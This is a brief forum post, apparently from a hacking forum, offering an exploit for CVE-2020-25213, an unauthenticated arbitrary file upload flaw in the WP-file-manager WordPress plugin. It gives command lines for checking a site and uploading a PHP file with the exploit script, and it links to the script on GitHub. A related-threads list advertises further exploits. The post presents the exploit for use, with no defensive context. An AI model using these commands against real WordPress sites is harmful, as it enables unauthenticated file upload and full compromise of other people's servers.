WP-file-manager expoit CVE-2020-25213
by teamkelvinsecteam - October 17, 2020 at 07:40 PM
#1
[Image: wp-file-manager_snap_3.png]

WP-file-manager wordpress plugin (<6.9) vulnerable to unauthenticated arbitary file upload resulting in full compromise of the system.


./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose

Snaps


https://github.com/mansoorr123/wp-file-m...2020-25213
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
CVE-2020-16009: v8 0day Bonduralts 4 272 November 23, 2020 at 09:51 PM
Last Post: woo0hoo0
Exploit for WebSocket Vulnerability in Apache Tomcat (CVE-2020-13935) teamkelvinsecteam 0 131 November 03, 2020 at 02:07 PM
Last Post: teamkelvinsecteam
CVE-FIND teamkelvinsecteam 0 129 October 27, 2020 at 10:13 PM
Last Post: teamkelvinsecteam

 Users browsing this thread: 1 Guest(s)